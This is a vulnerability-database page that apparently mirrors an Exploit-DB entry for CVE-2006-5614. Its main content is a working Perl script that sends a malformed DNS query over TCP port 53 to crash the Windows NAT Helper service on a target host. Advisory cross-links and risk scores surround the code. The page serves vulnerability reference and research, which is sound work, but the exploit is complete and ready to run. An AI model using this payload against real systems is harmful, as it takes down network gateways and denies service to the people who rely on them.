Lucene search
+L

Microsoft Windows - NAT Helper Components Remote Denial of Service

🗓️ 30 Oct 2006 00:00:00Reported by x82Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 52 Views

Microsoft Windows NAT Helper Components Remote DoS Exploit through IPv4 with DNS Payloa

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-5614
29 May 201815:50
circl
Check Point Advisories
Preemptive Protection against Microsoft Windows 'ipnathlp.dll' Denial of Service Vulnerability
14 Nov 200600:00
checkpoint_advisories
CVE
CVE-2006-5614
31 Oct 200601:00
cve
Cvelist
CVE-2006-5614
31 Oct 200601:00
cvelist
Exploit DB
Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service
28 Oct 200600:00
exploitdb
Metasploit
Microsoft Windows NAT Helper Denial of Service
8 Dec 200615:25
metasploit
NVD
CVE-2006-5614
31 Oct 200601:07
nvd
Packet Storm
Microsoft Windows NAT Helper Denial of Service
31 Aug 202400:00
packetstorm
#!/usr/bin/perl
##
## Microsoft Windows NAT Helper Components Remote DoS Exploit (2)
## **************************************************************
##
## .details
## --------
## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
##
## .info
## -----
## code by x82 <x82_ [at] bk [dot] ru>
## bug by h07  <h07 [at] interia [dot] pl>
##
## .greetz
## -------
## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;)
##
##

use warnings;
use diagnostics;
use strict;

use IO::Socket;


my $host = $ARGV[0]; # 192.168.0.1
my $port = 53; # standard port
my $payload =
# by h07
"\x6c\xb6".
"\x01\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00".
"\x00\x00". # <-- Bug is here 0x0000
"\x03\x77\x77\x77".
"\x06\x67\x6f\x6f".
"\x67\x6c\x65\x03".
"\x63\x6f\x6d\x00".
"\x00\x01".
"\x00\x01";

my $length = length($payload);

if((! $host || $host !~ /^\d{1,3}(\.\d{1,3}){3}$/))
{
	print "\n----------------------------------------------------------------------\n";
	print "Microsoft Windows NAT Helper Components Remote DoS Exploit\n";
	print "exploit by x82 <x82_ [at] bk [dot] ru>\n";
	print "bug discovered by h07 <h07 [at] interia [dot] pl>\n";
	print "----------------------------------------------------------------------";
	print "\n";
	print "usage: perl $0 192.168.0.1\n";
	exit;
}

my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port);
unless ($socket) { die "[-] Can\'t connect to $host" }

print "\n";
print "[+] connection established\n";
print "[*] Sending payload ..." . "(size: $length)\n";
sleep(5);

print $socket $payload;

print "[+] ok - payload sent\n";


## 29.10.2006

# milw0rm.com [2006-10-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.6
EPSS0.79086
52